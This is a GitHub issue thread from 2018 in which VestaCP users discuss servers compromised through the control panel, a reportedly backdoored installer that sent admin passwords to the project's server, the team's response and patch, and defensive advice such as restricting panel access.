Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

I got hacked and the they told me it was VestaCP #1715

Closed
SPIRY-RO opened this issue Sep 26, 2018 · 15 comments
Closed

I got hacked and the they told me it was VestaCP #1715

SPIRY-RO opened this issue Sep 26, 2018 · 15 comments

Comments

@SPIRY-RO
Copy link

SPIRY-RO commented Sep 26, 2018
edited
Loading

Operating System (OS/VERSION):

Ubuntu 16.04

VestaCP Version:

Latest

I got hacked and the support already asked me from the start if I had VestaCP installed. They put me on recovery mode I did a quick backup. Now I have to redo my server from scratch. Their ticket answer was

A reinstallation will be required to reactivate the server, then we suggest you to install latest vestacp version as the one you installed had a bug that was used to make attacks.
@MrGKanev
Copy link

If I am not mistaking there was a version with a big breach some time ago (a couple of months). If even the hosting provider told you it, you should keep vestaCP up to date. (like most of the software)

@SPIRY-RO
Copy link
Author

The problem is that I actually kept the latest version up-to-date 💯 %. I always do that!
I keep my systems up-to-date more then I should since newer patchers can have 0Day Exploits. Netherless. I was using the latest 0.9.8-22

@MrGKanev
Copy link

Do you have a backup of the VPS? If there really is a breach in vestaCP it can't be found without this kind of information.

@linuskom
Copy link

linuskom commented Oct 2, 2018

Security is a concern.

VestaCP roadmap document mentions that end-of-Sept-2018 there will be Version 0.9.8-23.
Its 02-Oct-2018. There has been no updates.

Any news?
I can' t even register on VestaCp forum site.

VestaCP should tell us of status, progress and milestones either on their website or on Git.

@ioannidesalex
Copy link
Contributor

Everything seems to be falling apart. Unfortunately.

@MrGKanev
Copy link

MrGKanev commented Oct 3, 2018

@ioannidesalex these type of months are always slow. Most of the people are on vacation and etc. I'm sure that the project isn't abandoned.

@ioannidesalex
Copy link
Contributor

@MrGKanev Come on, it's October already :)

At least a message saying "We are on it - check back in October".

@tlcd96
Copy link
Contributor

tlcd96 commented Oct 3, 2018

first things first.

@ioannidesalex everyone here got lives, serghey, dpeca, the rest of the admins, and also i that, when i can, make commits to the main vesta repo.

everyone is trying to make this project come foward, for example, i've corrected some things, others, need an review, and finally, others i cannot do.

make a issue if you have information that is relevant.

by issuing an pr, or an issue, you are helping, IF

  • the issue is an pertinent question and you have insights of the question;
    or you know who has it.
  • the issue is an bug report and you have details about the problem;
    you have the details that cause the problem or you know who has it.
  • the issue is an feature that will make the panel greater;
  • the pr is solving some problem;
  • the pr is an complete feature that serves all OS's that Vesta CP supports.

etc...~

be patient

you guys have to be patient, about the development. we are not paid, we, developers, make this on our free time.

is there really a bug on this version?

if there is, please add an issue and in the title say something like this [URGENT][BUG] - «small desc of the bug» because guessing games are hard.

So

if you want to help to make this even greater, try to learn bash, php, and the other languages that this panel use, try to fix an issue, and when you can, send an PR referring one of the admins, cause it is hard to develop something like this.
If you cannot program or think that is boring, at least submit bugs to the issues with the necessary details for us, DEVELOPERS, can start correcting the problem.

Finally

That's why, wherever i can, i help the admins to develop some features, or to correct bugs.
this is an great panel, but it cannot be developed by it's own.

@gytisrepecka
Copy link

Many control panels have suffered from attacks. I myself remember couple cases when entire servers were breached due to flaw in cPanel as well as Plesk, so Vesta is no exception. Those type of issues get patched quickly, but you have to be fast enough to update your servers.

The most you can do is limit access to panel (deny all, allow listed). If can't use that approach, at least have fail2ban and check for updates frequently.

@ghost
Copy link

ghost commented Oct 17, 2018

As per an analysis by a forum member on the official forums, the issue with hacked servers has to do with a "backdoored" installer that was served before that did upload the admin credentials to Vestas server in base64.

Look at these commits and judge by yourself:
Ubuntu

Introduced here:
a3f0fa1

Omitted here:
ee03eff

This issue may also be persistent in other installer-files for other operatingsystems and this explains why servers got hacked with no evidence of actual applications being exploited.

Vesta team, we as a community would like an answer regarding your fuck-up and how the passwords were breached.

@justbittin
Copy link

justbittin commented Oct 17, 2018
edited
Loading

I understand people have lives, but this team is responsible for the security of the package. To say, be patient, while servers are comprised, is reckless at minimium, and the fact Vesta team added the commit to send our passwords to vestacp.com is, IMHO, criminal.

This needs to be addressed NOW.

@gytisrepecka
Copy link

Apparently this is very serious. Team says their infrastructure servers were hacked.

There is reply from the team in forum: https://forum.vestacp.com/viewtopic.php?f=10&t=17641&hilit=passwords+sent+to+vestacp&start=180#p73907

@truongan
Copy link

My god this is serious. I'm changing admin password on my handful servers right now. I hope the best for vesta team.
IMHO, open source projects benefit the best from community interaction on platform like github. May this incident pushs vesta team toward retiring vestacp.com server during installation process. Aparently github less likely to get compromised and the community can help spot issues earlier.

@gytisrepecka
Copy link

Update is live, more details available in forum: https://forum.vestacp.com/viewtopic.php?f=10&t=17641&start=180#p73920

Apparently there was a flaw in password reset mechanism. According to post, calling back to vestacp.com after installation was also removed.

@SPIRY-RO
Copy link
Author

SPIRY-RO commented Dec 9, 2018
edited
Loading

I have been hacked recently again. Seems like he gained access to user "admin" , changed the password, deleted my backups and then asked money for my backups. And I had 0.9.8-23!

Thanks @serghey-rodin for the updates yet, your software is getting us total victims to Morocans and Russian hackers 👎 .

I think VestaCP is far from being safe on any system anymore. It is a total loss of time and resources.

@SPIRY-RO SPIRY-RO mentioned this issue Dec 9, 2018
Closed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
9 participants
@truongan @gytisrepecka @MrGKanev @SPIRY-RO @tlcd96 @justbittin @madeITBelgium @ioannidesalex @linuskom